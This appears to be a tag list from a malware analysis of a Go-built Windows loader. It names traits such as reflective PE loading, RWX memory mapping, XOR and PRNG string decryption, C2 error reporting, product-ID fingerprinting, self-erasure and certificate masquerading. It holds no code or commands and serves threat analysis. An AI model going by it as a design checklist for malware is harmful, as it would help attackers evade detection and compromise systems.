  • custom-base85-like-decoder
  • avx2-optimized-memcpy
  • runtime-getprocaddress-resolution
  • proc-thread-attribute-process-creation-surface
  • winhttp-https-download
  • pgo-release-build
  • go-reflective-pe-loader-prng-decoding
  • syscall-native-api-resolution
  • rwx-virtualalloc-payload-mapping
  • runtime-dll-loader-getprocaddress
  • pe-header-parser-in-memory
  • prng-seeded-custom-decryptor
  • xor-0x43-string-encryption
  • mutex-singleton-gate
  • winhttp-wininet-runtime-resolution
  • com-automation-vtable-dispatch
  • digitalproductid-fingerprinting
  • structured-error-c2-reporting
  • cmd-self-erasure-pattern
  • go-1.25.9-build
  • symtab-preserved-go-binary
  • unscramblex-cert-masquerade
  • prng-constant-seed-gate